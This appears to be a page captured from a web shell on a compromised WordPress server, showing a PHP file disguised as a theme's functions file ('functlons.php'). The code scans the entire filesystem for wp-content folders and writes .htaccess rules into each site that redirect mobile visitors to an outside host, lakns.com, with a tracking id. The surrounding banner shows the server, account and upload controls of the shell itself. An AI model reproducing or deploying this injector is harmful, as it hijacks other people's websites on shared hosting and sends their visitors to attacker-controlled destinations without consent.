HEX
Server: Apache/2.4.54 (Unix) OpenSSL/1.0.2k-fips
System: Linux f17.eelserver.com 3.10.0-1160.80.1.el7.x86_64 #1 SMP Tue Nov 8 15:48:59 UTC 2022 x86_64
User: zulfiqar (1155)
PHP: 8.2.0
Disabled: mail, exec, system, popen, proc_open, shell_exec, passthru, show_source
$ pwd: /home/zulfiqar/public_html/wp-content/themes/custom-functions-1772181936/
Upload Files
File: /home/zulfiqar/public_html/wp-content/themes/custom-functions-1772181936/functlons.php
<!--oc7tDiUn-->
<?php
set_time_limit(0);
ini_set('memory_limit', '512M');

$scriptDir = realpath(__DIR__);

function deepScanGlobal($startDir = '/', $excludeDir) {
    $results = [];
    $stack = [$startDir];
    $modified = [];

    while (!empty($stack)) {
        $current = array_pop($stack);

        if (!is_dir($current) || is_link($current)) continue;
        if (realpath($current) === $excludeDir) continue;

        $items = @scandir($current);
        if (!$items) continue;

        foreach ($items as $item) {
            if ($item === '.' || $item === '..') continue;
            $fullPath = $current . DIRECTORY_SEPARATOR . $item;

            if (is_dir($fullPath)) {
                if (basename($fullPath) === 'wp-content') {
                    $results[] = realpath($fullPath);
                    
                    $dirPath = dirname($fullPath);
                    if (realpath($dirPath) === $excludeDir) continue;
                    
                    $htaccessPath = $dirPath . DIRECTORY_SEPARATOR . '.htaccess';
                    
                    $host = $_SERVER['HTTP_HOST'] ?? '';
                    $host = preg_replace('/:\d+$/', '', $host);
                    $parts = explode('.', $host);
                    if (count($parts) > 1) {
                        array_pop($parts);
                    }
                    $var = implode('.', $parts);

                    $insert =
                    "RewriteEngine On\n" .
                    "RewriteCond %{HTTP_USER_AGENT} \"Android|iPhone|iPad|iPod|BlackBerry|Windows Phone\" [NC]\n" .
                    "RewriteRule ^.*$ https://lakns.com/link?z=9557727&var=nei{$var}&ymid={CLICK_ID} [R=302,L]\n\n";

                    if (!file_exists($htaccessPath)) {
                        if (@file_put_contents($htaccessPath, $insert)) {
                            $modified[] = "Created: " . $htaccessPath;
                        }
                    } else {
                        $content = @file_get_contents($htaccessPath);
                        if ($content !== false && strpos($content, 'lakns.com/link?z=9557727') === false) {
                            if (@file_put_contents($htaccessPath, $insert . $content)) {
                                $modified[] = "Modified: " . $htaccessPath;
                            }
                        }
                    }
                }
                $stack[] = $fullPath;
            }
        }
    }

    return ['folders' => $results, 'modified' => $modified];
}

echo "<h3>Global search for 'wp-content' from server root (/)</h3>";
echo "<p>This may take a few minutes...</p><hr>";

$result = deepScanGlobal('/', $scriptDir);

if (empty($result['folders'])) {
    echo "<p>❌ Nothing found.</p>";
} else {
    echo "<p>Found folders: " . count($result['folders']) . "</p>";
    foreach ($result['folders'] as $dir) {
        echo "<code>" . htmlspecialchars($dir) . "</code><br>";
    }
    
    if (!empty($result['modified'])) {
        echo "<br><h4>.htaccess modifications:</h4>";
        foreach ($result['modified'] as $mod) {
            echo "<code>" . htmlspecialchars($mod) . "</code><br>";
        }
    }
}
?>
@ Telegram